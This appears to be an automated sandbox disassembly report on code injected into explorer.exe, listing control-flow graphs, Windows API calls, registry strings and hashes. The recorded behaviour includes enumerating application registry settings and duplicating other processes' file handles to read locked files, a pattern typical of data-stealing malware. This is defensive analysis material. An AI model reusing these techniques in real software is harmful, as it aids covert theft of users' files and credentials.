                                    • Instruction Fuzzy Hash: 53718D71A04702DFD750EF28C88175ABBE0FF88724F104A29F9E8A7292D774D954CB92

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 606 82e30-82e55 StrStrIW 607 82ebe-82eec call 81000 RegOpenKeyExW 606->607 608 82e57-82e6c call 819e5 606->608 615 82f68-82f74 call 81011 607->615 616 82eee-82efd 607->616 613 82ebc 608->613 614 82e6e-82e79 call 81bc5 608->614 613->607 624 82e7b-82e85 call 81afe 614->624 625 82eb5-82eb7 call 81011 614->625 619 82f50-82f5c RegEnumKeyExW 616->619 622 82f5e-82f62 RegCloseKey 619->622 623 82eff-82f26 call 81953 call 8199d call 82e30 619->623 622->615 639 82f2b-82f4f call 81011 623->639 632 82eae-82eb0 call 81011 624->632 633 82e87-82e97 call 8199d 624->633 625->613 632->625 633->632 640 82e99-82ea0 call 82c77 633->640 639->619 640->632
                                    APIs
                                    • StrStrIW.SHLWAPI(?,?), ref: 00082E4B
                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00082EE4
                                    • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00082F54
                                    • RegCloseKey.KERNEL32(?), ref: 00082F62
                                      • Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
                                      • Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
                                      • Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
                                      • Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98
                                      • Part of subcall function 00081BC5: lstrlenW.KERNEL32(00000000,00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081BCC
                                      • Part of subcall function 00081BC5: StrStrIW.SHLWAPI(00000000,.exe), ref: 00081BF0
                                      • Part of subcall function 00081BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00081C05
                                      • Part of subcall function 00081BC5: lstrlenW.KERNEL32(00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081C1C
                                      • Part of subcall function 00081AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00081B16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                    • String ID: PathToExe
                                    • API String ID: 1799103994-1982016430
                                    • Opcode ID: 176bef6c441af3b74209ea396fc40097f656177413e2de5b0ffeb482d9c6ff9b
                                    • Instruction ID: 737ea95267dbba0b38d2cc2ed97825fc8b79697e55c450d9c33e4e3cb90f41d0
                                    • Opcode Fuzzy Hash: 176bef6c441af3b74209ea396fc40097f656177413e2de5b0ffeb482d9c6ff9b
                                    • Instruction Fuzzy Hash: D4317A71604211AF9B15AF21CC159AF7AEAFFC4350B04852DF89987282EE75C902DBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 644 84a71-84acf call 81000 wsprintfW RegCreateKeyExW 647 84ad1-84add RegCloseKey 644->647 648 84ae6-84af5 call 81011 644->648 647->648 649 84adf-84ae3 647->649 649->648
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • wsprintfW.USER32 ref: 00084AA2
                                    • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00084AC7
                                    • RegCloseKey.ADVAPI32(?), ref: 00084AD4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                    • String ID: %s\%08x$Software
                                    • API String ID: 1800864259-1658101971
                                    • Opcode ID: 45d3ed723e8728aaf1a2cd76e0cfc109dc4998e35e31a87ae645a26b94ee33a0
                                    • Instruction ID: 5840dc6503cc108a31221738e39441bd1e23fba901afdc883f4ef9a0ed6d19d0
                                    • Opcode Fuzzy Hash: 45d3ed723e8728aaf1a2cd76e0cfc109dc4998e35e31a87ae645a26b94ee33a0
                                    • Instruction Fuzzy Hash: A8012B71601108BFE7189F54DC8AEFF7BADEB44344F40016FF905A3141D6B26D409671

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 652 84317-8433d _alloca_probe RegOpenKeyW 653 843cf-843d6 652->653 654 84343-8436b RegEnumKeyExW 652->654 655 8436d 654->655 656 843c4-843ce RegCloseKey 654->656 657 8436e-843c1 call 81953 call 8199d call 8418a call 81011 RegEnumKeyExW 655->657 656->653 666 843c3 657->666 666->656
                                    APIs
                                    • _alloca_probe.NTDLL ref: 0008431C
                                    • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00084335
                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00084363
                                    • RegCloseKey.ADVAPI32(?), ref: 000843C8
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                      • Part of subcall function 0008418A: wsprintfW.USER32 ref: 00084212
                                      • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                      • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000843B9
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                    • String ID:
                                    • API String ID: 801677237-0
                                    • Opcode ID: 94190413aac87ea3199495c5d956d1a7f457b02da9cdaf68acba56015df3a036
                                    • Instruction ID: b5ac95aea56f536f4b5c73fd8efd5d921aaf08e2ac68ca3006de1c18578d18ae
                                    • Opcode Fuzzy Hash: 94190413aac87ea3199495c5d956d1a7f457b02da9cdaf68acba56015df3a036
                                    • Instruction Fuzzy Hash: A9112EB1104201BFE715AB10DC49DFB7BEDFB88344F00452EF889D2151EA799E499B72

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 742 819e5-819f5 743 819fa-81a26 RegOpenKeyExW 742->743 744 819f7 742->744 745 81a28-81a44 RegQueryValueExW 743->745 746 81aa2-81aa7 743->746 744->743 749 81a94-81aa0 RegCloseKey 745->749 750 81a46-81a4c 745->750 747 81aa9-81ab9 call 819e5 746->747 748 81abb 746->748 752 81abd-81ac3 747->752 748->752 749->746 749->748 750->749 753 81a4e-81a53 750->753 755 81a5a-81a7d call 81000 RegQueryValueExW 753->755 756 81a55-81a58 753->756 759 81a8b-81a92 call 81011 755->759 760 81a7f-81a81 755->760 756->749 756->755 759->749 760->749 762 81a83-81a89 760->762 762->749
                                    APIs
                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
                                    • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98
                                      • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                      • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: HeapQueryValue$CloseFreeOpenProcess
                                    • String ID:
                                    • API String ID: 217796345-0
                                    • Opcode ID: cbca13c41e6ad2c3ad6aba8c637af935e3bc4f0f4e53dd87436683ca29ff9f23
                                    • Instruction ID: c5571b0ed83ab8e9de6be7d93e5e899f2560c22a91db0528a38c0e6b8d46ffb2
                                    • Opcode Fuzzy Hash: cbca13c41e6ad2c3ad6aba8c637af935e3bc4f0f4e53dd87436683ca29ff9f23
                                    • Instruction Fuzzy Hash: 92217E7220A2416FE7289A21CD04FBBBBEDFFC8B54F040A2DF9D592151E625CD428722
                                    APIs
                                    • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00081ED5
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081F0C
                                    • RegCloseKey.ADVAPI32(?), ref: 00081F98
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                    • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081F82
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                    • String ID:
                                    • API String ID: 1077800024-0
                                    • Opcode ID: 7b9333fcc51c797b5218fbb23d2e6c6254682b66609f70ce016f7fe61c2493e6
                                    • Instruction ID: 4f23505752de744da42dfdbb6d717c3d1c776ca37b4fc414fa7c845c11fa981a
                                    • Opcode Fuzzy Hash: 7b9333fcc51c797b5218fbb23d2e6c6254682b66609f70ce016f7fe61c2493e6
                                    • Instruction Fuzzy Hash: 7D214F712083016FD705AB21DC45EAB7BEDFF88344F00492DF8D992152DB75C9069B61
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00081C46
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00083FA8), ref: 00081C56
                                    • CloseHandle.KERNEL32(00000000), ref: 00081C91
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00081C76
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                    • String ID:
                                    • API String ID: 2517252058-0
                                    • Opcode ID: 58ece550bef03a12f2c8c95344160bdb53c7dc2287bfa5caa7a1e707ffd5121a
                                    • Instruction ID: 222b11b4eaba821b6a78fa1be4fe8e728b09ea9ad0825c6bb9d4c4a76c9ad33d
                                    • Opcode Fuzzy Hash: 58ece550bef03a12f2c8c95344160bdb53c7dc2287bfa5caa7a1e707ffd5121a
                                    • Instruction Fuzzy Hash: E7F028312012187BD2202B26DC88EBB7F9CEF467F6F15031AF905931D1DB576C024670
                                    APIs
                                      • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                      • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00082EE4
                                    • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00082F54
                                    • RegCloseKey.KERNEL32(?), ref: 00082F62
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                    • String ID:
                                    • API String ID: 1066184869-0
                                    • Opcode ID: 2ad7e6767ee96b79d21ba100cb8b695183dda1ff5abafa8c65141433d0a563cb
                                    • Instruction ID: eb41579e80b7c950b35f1486a4d2b204f65a8b7140ff6c4f8f4aa4cb4ca9842d
                                    • Opcode Fuzzy Hash: 2ad7e6767ee96b79d21ba100cb8b695183dda1ff5abafa8c65141433d0a563cb
                                    • Instruction Fuzzy Hash: C5016231205250AB9715BF21DC05EEF7FADFFC4351F00442DF99992192DA758846EFA1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: ExitInitializeProcessUninitialize
                                    • String ID:
                                    • API String ID: 4175140541-0
                                    • Opcode ID: 518c430dfff4d9d4c723df7a32eae010c3fc126e0e84deb4cb3f28f6201afda5
                                    • Instruction ID: c567147c66812ba5e2ac9ba65c59c1b167aaf398ae84f332e5484db75709233c
                                    • Opcode Fuzzy Hash: 518c430dfff4d9d4c723df7a32eae010c3fc126e0e84deb4cb3f28f6201afda5
                                    • Instruction Fuzzy Hash: B2C09B343465014BF6C03BF05C0D7193758BF00757F045013FA45CA091DF5644008B33
                                    APIs
                                    • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00089FF8
                                    Strings
                                    • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0008A00E
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: CreateHeap
                                    • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                    • API String ID: 10892065-982776804
                                    • Opcode ID: 1e6db2da140d01e1a68dfa4cea175d4ba005d2fcd999c214ed22800c6a33e8df
                                    • Instruction ID: de4c9e21946e3b268851ec9f55ea6e7eb272948646484cd6e4629a4b53bf34a6
                                    • Opcode Fuzzy Hash: 1e6db2da140d01e1a68dfa4cea175d4ba005d2fcd999c214ed22800c6a33e8df
                                    • Instruction Fuzzy Hash: CCF0F672704381BAF7313A549C88F7B679CFB95B85F24043AFAC5E6241E670AC408731
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00081B16
                                      • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                      • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                      • Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
                                      • Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
                                      • Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
                                      • Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00081B40
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                    • API String ID: 2162223993-2036018995
                                    • Opcode ID: d8da52ebf54bab53ae3ca41385c84507770efb2167d087fcb706d6c52b73b34a
                                    • Instruction ID: 337aa3add9a7764b0e93f6c42cfcb22d188dfd0b15f865120cd01d535eb4066c
                                    • Opcode Fuzzy Hash: d8da52ebf54bab53ae3ca41385c84507770efb2167d087fcb706d6c52b73b34a
                                    • Instruction Fuzzy Hash: D3F0BB3670064817D611752ACC84EE7368EEFD53A67160029F49993242DF676C425374
                                    APIs
                                    • RtlAllocateHeap.NTDLL(02730000,00000000,?), ref: 00089EB5
                                    Strings
                                    • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00089ECD
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                    • API String ID: 1279760036-667713680
                                    • Opcode ID: 571bb11c0abf0816024da647f261a0c95338da32ac75e42e57d66a358eef1667
                                    • Instruction ID: 6d0ecc66742d84c592a4f73b3664b1b7ebf4e9bfc3f597e36e2858d6c86bab0f
                                    • Opcode Fuzzy Hash: 571bb11c0abf0816024da647f261a0c95338da32ac75e42e57d66a358eef1667
                                    • Instruction Fuzzy Hash: 48E0C2336082507BD2123798AC45FBFBB69EB94F50F090025FA44BA665C2789C0187A3
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                    • CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: CloseCreateFileHandle
                                    • String ID:
                                    • API String ID: 3498533004-0
                                    • Opcode ID: eb43647509e1e4959db50d8f341f5a13d07f2a5c4a231fd9d802d1b51a62afd6
                                    • Instruction ID: 8967703e6551b72cc132f61c34cb4fc831c410cbcc874edd5a13349f8287a700
                                    • Opcode Fuzzy Hash: eb43647509e1e4959db50d8f341f5a13d07f2a5c4a231fd9d802d1b51a62afd6
                                    • Instruction Fuzzy Hash: 96D0E2B125363062E5B526257C08EE76E5CAF02AB5B080626BA9D95090E629888782E0
                                    APIs
                                    • HeapFree.KERNEL32(02730000,00000000,?), ref: 00089EF8
                                    Strings
                                    • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00089F0E
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID: failed to HeapFree block %p (%lu), heap=%p
                                    • API String ID: 3298025750-4030396798
                                    • Opcode ID: 12b465bb088f3113cd471a2dd04985769108c502fa93156c4168459b9eba0620
                                    • Instruction ID: 72a351b7fcbe53219eb4fa4a00916c69a200bf7d54dc485bfead5e0c0727eb3b
                                    • Opcode Fuzzy Hash: 12b465bb088f3113cd471a2dd04985769108c502fa93156c4168459b9eba0620
                                    • Instruction Fuzzy Hash: 52D0C232208240B7E2013B509C41F3B777DAB94F00F4C0029F354A9467D2789441AB22
                                    APIs
                                      • Part of subcall function 00081162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0008116F
                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                    • HeapFree.KERNEL32(00000000), ref: 00081027
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcessQueryVirtual
                                    • String ID:
                                    • API String ID: 2580854192-0
                                    • Opcode ID: 4eef8bc90a0115e1a74d84085bfb8a5dca21e42519d300382b8c9dff5260257b
                                    • Instruction ID: 5ce1e110c10a9ede8fa499c3b28381eecf3aac34fcf651ed23811ac42075f2bd
                                    • Opcode Fuzzy Hash: 4eef8bc90a0115e1a74d84085bfb8a5dca21e42519d300382b8c9dff5260257b
                                    • Instruction Fuzzy Hash: 3AC04C7540627056D9A037A47D0DBCA2B5DEF49362F090442B94697152CAAA8C4287B0
                                    APIs
                                    • RtlZeroMemory.NTDLL(?,00000018), ref: 000812B5
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: MemoryZero
                                    • String ID:
                                    • API String ID: 816449071-0
                                    • Opcode ID: b063bd152322d9604de73742df269dbb7a13d3f582f0240a776bd5140e3242e5
                                    • Instruction ID: 14c05a8ab06494b0ae547c37f8bfa808a2e10712437e9a35d7c301f943bfb637
                                    • Opcode Fuzzy Hash: b063bd152322d9604de73742df269dbb7a13d3f582f0240a776bd5140e3242e5
                                    • Instruction Fuzzy Hash: BC11E6B5A01209AFEB10EFA5D984AEEB7FCFF08341B14402AFD45E3241D7359A01CB60
                                    APIs
                                    • GetFileAttributesExW.KERNELBASE(00000000,00000000,?,?,00000000,-00080006), ref: 0008B848
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 253653adaefd223fbb8662ff93d56f4a9bd32f1c0072db9f85219bdcfa108373
                                    • Instruction ID: 918e8a1a8635a5898706c2da4a37bb00d924ac56ebc7212c3da473aa57b161de
                                    • Opcode Fuzzy Hash: 253653adaefd223fbb8662ff93d56f4a9bd32f1c0072db9f85219bdcfa108373
                                    • Instruction Fuzzy Hash: 10F09631A0421CDADB20AABE9C44AEEF7ECEB49764F104226E955E2091EB708D05C7D5
                                    APIs
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00081684
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID:
                                    • API String ID: 2244384528-0
                                    • Opcode ID: fb4c7f087d85d2d63b4df43d6836f5551ef695e3cca08a44398b5e6e88bfccad
                                    • Instruction ID: 1aa3336bd32c6042c164ad73d0f7d071ef6f1d2de0bbdc4326f5a1605f10dd89
                                    • Opcode Fuzzy Hash: fb4c7f087d85d2d63b4df43d6836f5551ef695e3cca08a44398b5e6e88bfccad
                                    • Instruction Fuzzy Hash: FBC012301212219EE7602B208C09B8627D8AF197A2F06092AA8C19A080E2A908C08AA0
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0008158A), ref: 00081056
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 95ebccbb62652008143a9f0522e465b2c08813a599faf1d21dc5491d365e052f
                                    • Instruction ID: 33199f922d5af04a34751f0835a7a6930012b223197b71027ff47a41be215880
                                    • Opcode Fuzzy Hash: 95ebccbb62652008143a9f0522e465b2c08813a599faf1d21dc5491d365e052f
                                    • Instruction Fuzzy Hash: 76A002F07D63007AFD695762AE1FF162E389740F02F100245B70D7C0D095E97500853D
                                    APIs
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00084A5B,?,?,00000000,?,?,?,?,00084B66,?), ref: 00081065
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 8cc8155a45e5bdf3d6ecbf97db3d338031fe5cd3e4b13a83c9c05cbe19853f49
                                    • Instruction ID: bdaa146f7cbaa874197a4f7c39aada78053c5e51522d3c5a0494c2ac97adf33b
                                    • Opcode Fuzzy Hash: 8cc8155a45e5bdf3d6ecbf97db3d338031fe5cd3e4b13a83c9c05cbe19853f49
                                    • Instruction Fuzzy Hash: A1A0027469170066FDB457205D0AF0527146740B01F244545B641A90D18DAAF0448A28
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000834C0
                                      • Part of subcall function 000833C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00083401
                                    • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,000837A8), ref: 000834E9
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0008351E
                                    • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00083541
                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00083586
                                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0008358F
                                    • lstrcmpiW.KERNEL32(00000000,File), ref: 000835B6
                                    • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 000835DE
                                    • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 000835F6
                                    • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00083606
                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0008361E
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00083631
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00083658
